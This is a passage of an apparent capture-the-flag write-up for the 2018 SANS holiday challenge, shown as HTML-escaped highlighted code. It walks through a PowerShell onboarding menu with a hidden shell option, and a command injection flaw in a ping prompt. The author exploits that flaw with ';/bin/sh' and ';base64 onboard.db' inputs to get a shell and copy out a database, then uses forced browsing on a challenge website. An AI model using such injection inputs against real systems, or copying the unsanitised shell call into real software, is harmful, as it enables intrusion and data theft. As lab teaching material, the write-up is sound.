        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="o"&gt;-lt&lt;/span&gt; &lt;span class="nv"&gt;$intro&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;Is this correct?&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
            &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="nv"&gt;$intro&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="nv"&gt;$global:firstrun&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$FALSE&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="n"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$i&lt;/span&gt; &lt;span class="o"&gt;-lt&lt;/span&gt; &lt;span class="nv"&gt;$header&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;++)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="nv"&gt;$header&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;$i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; Press &amp;#39;&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; to start the onboard process.&amp;#39;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; Press &amp;#39;&lt;/span&gt;&lt;span class="n"&gt;2&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; to verify the system.&amp;#39;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; Press &amp;#39;&lt;/span&gt;&lt;span class="n"&gt;q&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; to quit.&amp;#39;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;Employee-Onboarding-Form&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;Welcome to Santa&amp;#39;s Castle!&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;At Santa&amp;#39;s Castle, our employees are our family. We care for each other,&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;and support everyone in our common goals.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Your first test at Santa&amp;#39;s Castle is to complete the new employee onboarding paperwork.&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Don&amp;#39;t worry, it&amp;#39;s an easy test! Just complete the required onboarding information below.&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

    &lt;span class="nv"&gt;$efirst&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your first name.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$elast&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your last name.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$estreet1&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your street address (line 1 of 2).&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$estreet2&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your street address (line 2 of 2).&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$ecity&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your city.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$epostalcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your postal code.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$ephone&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your phone number.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nv"&gt;$eemail&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Enter your email address.&lt;/span&gt;&lt;span class="se"&gt;`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;

    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;Is this correct?&lt;/span&gt;&lt;span class="se"&gt;`n`n&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$efirst $elast&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$estreet1&amp;quot;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$estreet2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$estreet2&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$ecity, $epostalcode&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$ephone&amp;quot;&lt;/span&gt;
    &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;$eemail&amp;quot;&lt;/span&gt;

    &lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;y/n&amp;#39;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;y&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;-Or&lt;/span&gt; &lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Y&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Save to sqlite DB using command line&amp;quot;&lt;/span&gt;
        &lt;span class="nb"&gt;Start-Process&lt;/span&gt; &lt;span class="n"&gt;-FilePath&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;./sqlite3&amp;quot;&lt;/span&gt; &lt;span class="n"&gt;-ArgumentList&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;onboard.db &lt;/span&gt;&lt;span class="se"&gt;`&amp;quot;&lt;/span&gt;&lt;span class="s2"&gt;INSERT INTO onboard (fname, lname, street1, street2, city, postalcode, phone, email) VALUES (&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$efirst&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;,&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$elast&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$estreet1&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$estreet2&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$ecity&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$epostalcode&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$ephone&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;$eemail&lt;/span&gt;&lt;span class="se"&gt;`&amp;#39;&lt;/span&gt;&lt;span class="s2"&gt;)&lt;/span&gt;&lt;span class="se"&gt;`&amp;quot;&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;try&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;do&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nb"&gt;Show-Menu&lt;/span&gt;
        &lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Please make a selection&amp;#39;&lt;/span&gt;
        &lt;span class="k"&gt;switch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$input&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="s1"&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nb"&gt;cls&lt;/span&gt;
                &lt;span class="n"&gt;Employee-Onboarding-Form&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nb"&gt;cls&lt;/span&gt;
                &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Validating data store for employee onboard information.&amp;quot;&lt;/span&gt;
                &lt;span class="nv"&gt;$server&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Read-Host&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Enter address of server&amp;#39;&lt;/span&gt;
                &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bash&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/bin/ping -c 3 $server&amp;quot;&lt;/span&gt;
                &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bash&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;/usr/bin/file onboard.db&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;9&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;                &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;usr&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;pwsh&lt;/span&gt;
&lt;/span&gt;                &lt;span class="k"&gt;return&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;q&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="nb"&gt;Write-Host&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Invalid entry.&amp;quot;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="n"&gt;pause&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;until&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$input&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;q&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;finally&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It seems that our menu has an hidden function. If we input &lt;code&gt;9&lt;/code&gt;, we get
access to a PowerShell console. Let's do so, and use our shell to analyze the
&lt;code&gt;onboard.db&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;Please make a selection: 9&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;PowerShell v6.0.3&lt;/span&gt;
&lt;span class="go"&gt;Copyright (c) Microsoft Corporation. All rights reserved.&lt;/span&gt;

&lt;span class="go"&gt;https://aka.ms/pscore6-docs&lt;/span&gt;
&lt;span class="go"&gt;Type &amp;#39;help&amp;#39; to get help.&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;sqlite3&lt;/span&gt; &lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;onboard&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;SQLite version 3.11.0 2016-02-15 17:29:24&lt;/span&gt;
&lt;span class="go"&gt;Enter &amp;quot;.help&amp;quot; for usage hints.&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;sqlite&amp;gt; .schema&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;CREATE TABLE onboard (&lt;/span&gt;
&lt;span class="go"&gt;    id INTEGER PRIMARY KEY,&lt;/span&gt;
&lt;span class="go"&gt;    fname TEXT NOT NULL,&lt;/span&gt;
&lt;span class="go"&gt;    lname TEXT NOT NULL,&lt;/span&gt;
&lt;span class="go"&gt;    street1 TEXT,&lt;/span&gt;
&lt;span class="go"&gt;    street2 TEXT,&lt;/span&gt;
&lt;span class="go"&gt;    city TEXT,&lt;/span&gt;
&lt;span class="go"&gt;    postalcode TEXT,&lt;/span&gt;
&lt;span class="go"&gt;    phone TEXT,&lt;/span&gt;
&lt;span class="go"&gt;    email TEXT&lt;/span&gt;
&lt;span class="go"&gt;);&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;sqlite&amp;gt; select * from onboard where lname = &amp;#39;Chan&amp;#39;;&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hello, Scott Chan! We can now use &lt;code&gt;runtoanswer&lt;/code&gt; to input our answer:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS /home/elf&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;./&lt;/span&gt;&lt;span class="n"&gt;runtoanswer&lt;/span&gt;
&lt;span class="go"&gt;Loading, please wait.....&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Enter Mr. Chan&amp;#39;s first name: Scott&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;    .;looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooool:&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;  &amp;#39;ooooooooooookOOooooxOOdodOOOOOOOdoxOOdoooooOOkoooooooxO   Okdooooooooooooo;&lt;/span&gt;
&lt;span class="go"&gt; &amp;#39;oooooooooooooX  ooooO  xod       xoO  xooooo  Xoooook    0    Oooooooooooooo;&lt;/span&gt;
&lt;span class="go"&gt; :oooooooooooooX  ooooO  xod  0ooooooO  xooooo  Xoooox   ooooo   kooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; coooooooooooooX         xod      0ooO  xooooo  XooooO  koooook   ooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; coooooooooooooX  dddd0  xod  0ddddooO  xooooo  XooooO  OoooooO  kooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; coooooooooooooX  ooooO  xod  KxxxxdoO  Okkkxo  XkkkkdX   xxk    oooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; cooooooooooooo0  ooook  dod       kok      Oo      Xook      Kxooooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; cooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; cooooooooooooooooooooooooooooooooo MY NAME IS oooooooooooooooooooooooooooooooo&lt;/span&gt;
&lt;span class="go"&gt; cddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddo&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMMMMNXXWMMMMMMMNXXWMMMMMMWXKXWMMMMWWWWWWWWWMWWWWWWWWWMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMW:  .. ;MMMk&amp;#39;     .NMX:.  .  .lWO         d         xMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMo  OMMWXMMl  lNMMNxWK  ,XMMMO  .MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMX.  .cOWMN  &amp;#39;MMMMMMM;  WMMMMMc  KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMMMKo,   KN  ,MMMMMMM,  WMMMMMc  KMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMKNMMMO  oM,  dWMMWOWk  cWMMMO  ,MMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; OMMMMMMMMMMMMc ...  cWMWl.  .. .NMk.  ..  .oMMMMM. .MMMMMMM, .MMMMMMMMMMMMMMMW&lt;/span&gt;
&lt;span class="go"&gt; xXXXXXXXXXXXXXKOxk0XXXXXXX0kkkKXXXXXKOkxkKXXXXXXXKOKXXXXXXXKO0XXXXXXXXXXXXXXXK&lt;/span&gt;
&lt;span class="go"&gt; .oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,&lt;/span&gt;
&lt;span class="go"&gt;  .looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo,&lt;/span&gt;
&lt;span class="go"&gt;    .,cllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllc;.&lt;/span&gt;

&lt;span class="go"&gt;Congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Lucky we had this hidden functionality. But what if it wasn't there? Well, we
can still use our command injection vulnerability to drop to a shell:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Validating data store for employee onboard information.
&lt;span class="hll"&gt;Enter address of server: ;/bin/sh
&lt;/span&gt;Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
&lt;span class="hll"&gt;$ ls
&lt;/span&gt;menu.ps1  onboard.db  runtoanswer
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And what if we can't run &lt;code&gt;/bin/sh&lt;/code&gt;? Well, we can still recover the SQLite
database file, and analyze it offline. To do so, we can base64 encode it, which
is kind of my favorite trick:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Validating data store for employee onboard information.
&lt;span class="hll"&gt;Enter address of server: ;base64 onboard.db
&lt;/span&gt;Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
U1FMaXRlIGZvcm1hdCAzABAAAQEAQCAgAAAAAQAAAAYAAAAAAAAAAAAAAAEAAAAEAAAAAAAAAAAA
AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAC4FQg0AAAABDxUADxUAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We then copy/paste the encoded file to our computer, decode it, and interrogate
it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; base64 -d &amp;lt; onboard.db.b64 &amp;gt; onboard.db
&lt;span class="gp"&gt;$&lt;/span&gt; file onboard.db
&lt;span class="go"&gt;onboard.db: SQLite 3.x database, last written using SQLite version 3016002&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; sqlite3 onboard.db
&lt;span class="go"&gt;SQLite version 3.22.0 2018-01-22 18:45:57&lt;/span&gt;
&lt;span class="go"&gt;Enter &amp;quot;.help&amp;quot; for usage hints.&lt;/span&gt;
&lt;span class="go"&gt;sqlite&amp;gt; select * from onboard where lname=&amp;quot;Chan&amp;quot;;&lt;/span&gt;
&lt;span class="go"&gt;84|Scott|Chan|48 Colorado Way||Los Angeles|90067|4017533509|scottmchan90067@gmail.com&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="analyzing-the-kringlecon-cfp-website"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id11"&gt;Analyzing the KringleCon CFP website&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We're asked to find who submitted the rejected talk titled &lt;strong&gt;Data Loss for
Rainbow Teams: A Path in the Darkness&lt;/strong&gt;, and to take a look at &lt;a class="reference external" href="https://cfp.kringlecastle.com/"&gt;KringleCon's
CFP website&lt;/a&gt; to find out.&lt;/p&gt;
&lt;p&gt;The web site is simple enough, and has a link marked &amp;quot;CFP&amp;quot;. When we click on
it, we're taken to the webpage &lt;a class="reference external" href="https://cfp.kringlecastle.com/cfp/cfp.html"&gt;https://cfp.kringlecastle.com/cfp/cfp.html&lt;/a&gt;,
which tells us that the CFP is closed. However, we're not at the root of the
&lt;code&gt;cfp&lt;/code&gt; folder. Let's forcefully browse to
&lt;a class="reference external" href="https://cfp.kringlecastle.com/cfp/"&gt;https://cfp.kringlecastle.com/cfp/&lt;/a&gt;:&lt;/p&gt;
&lt;img alt="cfp_rejected_talks.png" class="align-center" src="/images/sans-christmas-challenge-2018/cfp_rejected_talks.png" /&gt;
&lt;p&gt;We find a CSV file called &lt;code&gt;rejected-talks.csv&lt;/code&gt;. If we search the talk
name in it, we'll find that submitter is one &lt;a class="reference external" href="https://en.wikipedia.org/wiki/John_McClane"&gt;John McClane&lt;/a&gt;:&lt;/p&gt;
